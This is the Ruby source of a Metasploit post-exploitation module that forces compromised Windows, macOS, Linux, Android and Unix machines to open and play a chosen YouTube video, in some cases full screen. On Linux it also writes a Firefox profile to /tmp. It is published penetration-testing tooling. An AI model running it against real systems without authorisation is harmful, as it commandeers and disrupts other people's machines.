metasploit-framework/modules/post/multi/manage/play_youtube.rb

169 lines
4.7 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Multi Manage YouTube Broadcast',
'Description' => %q{
This module will broadcast a YouTube video on specified compromised systems. It will play
the video in the target machine's native browser. The VID datastore option is the "v"
parameter in a YouTube video's URL.
Enabling the EMBED option will play the video in full screen mode through a clean interface
but is not compatible with all videos.
This module will create a custom profile for Firefox on Linux systems in the /tmp directory.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'Platform' => [ 'win', 'osx', 'linux', 'android', 'unix' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Notes' => {
# ARTIFACTS_ON_DISK when the platform is linux
'SideEffects' => [ ARTIFACTS_ON_DISK, AUDIO_EFFECTS, SCREEN_EFFECTS ]
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
android_*
stdapi_sys_process_execute
]
}
}
)
)
register_options(
[
OptBool.new('EMBED', [true, 'Use the embed version of the YouTube URL', true]),
OptString.new('VID', [true, 'The video ID to the YouTube video', 'kxopViU98Xo'])
]
)
end
def youtube_url
if datastore['EMBED']
"https://youtube.com/embed/#{datastore['VID']}?autoplay=1&loop=1&disablekb=1&modestbranding=1&iv_load_policy=3&controls=0&showinfo=0&rel=0"
else
"https://youtube.com/watch?v=#{datastore['VID']}"
end
end
#
# The OSX version uses an apple script to do this
#
def osx_start_video(_id)
script = ''
script << %(osascript -e 'tell application "Safari" to open location "#{youtube_url}"' )
script << %(-e 'activate application "Safari"' )
script << %(-e 'tell application "System Events" to key code {59, 55, 3}')
begin
cmd_exec(script)
rescue EOFError
return false
end
true
end
#
# The Windows version uses the "embed" player to make sure IE won't download the SWF as an object
#
def win_start_video(_id)
iexplore_path = 'C:\\Program Files\\Internet Explorer\\iexplore.exe'
begin
session.sys.process.execute(iexplore_path, "-k #{youtube_url}")
rescue Rex::Post::Meterpreter::RequestError
return false
end
true
end
#
# The Linux version uses Firefox
# TODO: Try xdg-open?
#
def linux_start_video(_id)
begin
# Create a profile
profile_name = Rex::Text.rand_text_alpha(8)
display = get_env('DISPLAY') || ':0'
vprint_status("Creating profile #{profile_name} using display #{display}")
o = cmd_exec(%(firefox --display #{display} -CreateProfile "#{profile_name} /tmp/#{profile_name}"))
# Add user-defined settings to profile
s = %|
user_pref("dom.disable_open_during_load", false);
user_pref("browser.shell.checkDefaultBrowser", false);
|
write_file("/tmp/#{profile_name}/prefs.js", s)
# Start the video
data_js = %|"data:text/html,<script>window.open('#{youtube_url}','','width:100000px;height:100000px');</script>"|
joe = "firefox --display #{display} -p #{profile_name} #{data_js} &"
cmd_exec("/bin/sh -c #{joe.shellescape}")
rescue EOFError
return false
end
true
end
#
# The Android version is launched via an Intent
#
def android_start_video(id)
intenturl = "intent://youtube.com/watch?v=#{id}&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end"
begin
session.android.activity_start(intenturl)
rescue Rex::Post::Meterpreter::RequestError
return false
end
true
end
# The generic Unix version calls xdg-open(1) or open(1)
def unix_start_video(_id)
cmd_exec("xdg-open '#{youtube_url}' || open '#{youtube_url}'")
true
rescue EOFError
false
end
def start_video(id)
case session.platform
when 'osx'
osx_start_video(id)
when 'windows'
win_start_video(id)
when 'linux'
linux_start_video(id)
when 'android'
android_start_video(id)
when 'unix'
unix_start_video(id)
end
end
def run
id = datastore['VID']
print_status("#{peer} - Spawning video...")
if start_video(id)
print_good("#{peer} - The video has started")
else
print_error("#{peer} - Unable to start the video")
return
end
end
end